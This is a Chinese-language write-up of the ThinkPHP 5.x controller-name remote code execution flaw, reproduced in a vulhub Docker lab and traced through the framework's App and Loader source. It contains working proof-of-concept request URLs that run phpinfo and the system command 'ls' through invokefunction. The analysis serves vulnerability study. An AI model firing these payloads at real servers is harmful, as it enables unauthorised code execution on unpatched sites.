Thinkphp在2018/12/10发布了安全更新:
影响版本
5.x < 5.0.23
5.1.x <= 5.1.31
漏洞复现
- 环境:
docker vulhub ubuntu thinkphp5.0.22 - POC:
代码执行:
http://your-ip:8080/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
命令执行:
http://192.168.232.128:8080/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
漏洞分析
- 成因:
框架对控制器名没有进行足够的检测,导致可以用命名空间的方式来调用任意类的任意方法。 - 分析
在thinkphp\\library\\think\\App.php中设置当前请求的控制器、操作
// 获取控制器名
$controller = strip_tags($result[1] ?: $config[\'default_controller\']);
$controller = $convert ? strtolower($controller) : $controller;
// 获取操作名
$actionName = strip_tags($result[2] ?: $config[\'default_action\']);
if (!empty($config[\'action_convert\'])) {
$actionName = Loader::parseName($actionName, 1);
} else {
$actionName = $convert ? strtolower($actionName) : $actionName;
}
// 设置当前请求的控制器、操作
$request->controller(Loader::parseName($controller, 1))->action($actionName);
跟踪controller
在该文件下的exec函数中执行了控制器操作
protected static function exec($dispatch, $config)
{
switch ($dispatch[\'type\']) {
case \'redirect\': // 重定向跳转
$data = Response::create($dispatch[\'url\'], \'redirect\')
->code($dispatch[\'status\']);
break;
case \'module\': // 模块/控制器/操作
$data = self::module(
$dispatch[\'module\'],
$config,
isset($dispatch[\'convert\']) ? $dispatch[\'convert\'] : null
);
break;
case \'controller\': // 执行控制器操作
$vars = array_merge(Request::instance()->param(), $dispatch[\'var\']);
$data = Loader::action(
$dispatch[\'controller\'],
$vars,
$config[\'url_controller_layer\'],
$config[\'controller_suffix\']
);
break;
case \'method\': // 回调方法
$vars = array_merge(Request::instance()->param(), $dispatch[\'var\']);
$data = self::invokeMethod($dispatch[\'method\'], $vars);
break;
case \'function\': // 闭包
$data = self::invokeFunction($dispatch[\'function\']);
break;
case \'response\': // Response 实例
$data = $dispatch[\'response\'];
break;
default:
throw new \\InvalidArgumentException(\'dispatch type not support\');
}
return $data;
}
执行控制器操作代码块
case \'controller\': // 执行控制器操作
$vars = array_merge(Request::instance()->param(), $dispatch[\'var\']);
$data = Loader::action(
$dispatch[\'controller\'],
$vars,
$config[\'url_controller_layer\'],
$config[\'controller_suffix\']
);
这里调用了Loader的action,我们继续跟踪
public static function action($url, $vars = [], $layer = \'controller\', $appendSuffix = false)
{
$info = pathinfo($url);
$action = $info[\'basename\'];
$module = \'.\' != $info[\'dirname\'] ? $info[\'dirname\'] : Request::instance()->controller();
$class = self::controller($module, $layer, $appendSuffix);
if ($class) {
if (is_scalar($vars)) {
if (strpos($vars, \'=\')) {
parse_str($vars, $vars);
} else {
$vars = [$vars];
}
}
return App::invokeMethod([$class, $action . Config::get(\'action_suffix\')], $vars);
}
return false;
}
我们看到$class = self::controller($module, $layer, $appendSuffix);,这里调用了当前文件下的controller
我们跟踪controller
public static function controller($name, $layer = \'controller\', $appendSuffix = false, $empty = \'\')
{
list($module, $class) = self::getModuleAndClass($name, $layer, $appendSuffix);
if (class_exists($class)) {
return App::invokeClass($class);
}
if ($empty) {
$emptyClass = self::parseClass($module, $layer, $empty, $appendSuffix);
if (class_exists($emptyClass)) {
return new $emptyClass(Request::instance());
}
}
throw new ClassNotFoundException(\'class not exists:\' . $class, $class);
}
在这里又调用了getModuleAndClass方法,跟踪该方法
protected static function getModuleAndClass($name, $layer, $appendSuffix)
{
if (false !== strpos($name, \'\\\\\')) {
$module = Request::instance()->module();
$class = $name;
} else {
if (strpos($name, \'/\')) {
list($module, $name) = explode(\'/\', $name, 2);
} else {
$module = Request::instance()->module();
}
$class = self::parseClass($module, $layer, $name, $appendSuffix);
}
return [$module, $class];
}
其中
if (false !== strpos($name, \'\\\\\')) {
$module = Request::instance()->module();
$class = $name;
}
简单分析可知如果控制器名中存在/(不存在\\)就会直接返回
$class要经过parseClass方法解析,跟踪该方法
public static function parseClass($module, $layer, $name, $appendSuffix = false)
{
$array = explode(\'\\\\\', str_replace([\'/\', \'.\'], \'\\\\\', $name));
$class = self::parseName(array_pop($array), 1);
$class = $class . (App::$suffix || $appendSuffix ? ucfirst($layer) : \'\');
$path = $array ? implode(\'\\\\\', $array) . \'\\\\\' : \'\';
return App::$namespace . \'\\\\\' .
($module ? $module . \'\\\\\' : \'\') .
$layer . \'\\\\\' . $path . $class;
}
先是分割,parseName方法是thinkphp的命名风格转换
最后拼接返回
这样getModuleAndClass返回的是一个带命名空间的完整类名
controller函数中list($module, $class) = self::getModuleAndClass($name, $layer, $appendSuffix);这句代码我们差不多分析完了,回到controller中
public static function controller($name, $layer = \'controller\', $appendSuffix = false, $empty = \'\')
{
list($module, $class) = self::getModuleAndClass($name, $layer, $appendSuffix);
if (class_exists($class)) {
return App::invokeClass($class);
}
if ($empty) {
$emptyClass = self::parseClass($module, $layer, $empty, $appendSuffix);
if (class_exists($emptyClass)) {
return new $emptyClass(Request::instance());
}
}
throw new ClassNotFoundException(\'class not exists:\' . $class, $class);
}
判断了类是否存在,不存在会自动加载类
之后就是实例化类,调用类的方法
综上,由于判断类的命名空间采用的是判断是否存在\\,所以我们可以用\\来构建命名空间,从而调用类的方法
在App.php文件中App类的invokeFunction的作用是执行函数
public static function invokeFunction($function, $vars = [])
{
$reflect = new \\ReflectionFunction($function);
$args = self::bindParams($reflect, $vars);
// 记录执行信息
self::$debug && Log::record(\'[ RUN ] \' . $reflect->__toString(), \'info\');
return $reflect->invokeArgs($args);
}
因此构造poc:
http://your-ip:8080/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
(call_user_func_array : 调用回调函数,并把一个数组参数作为回调函数的参数)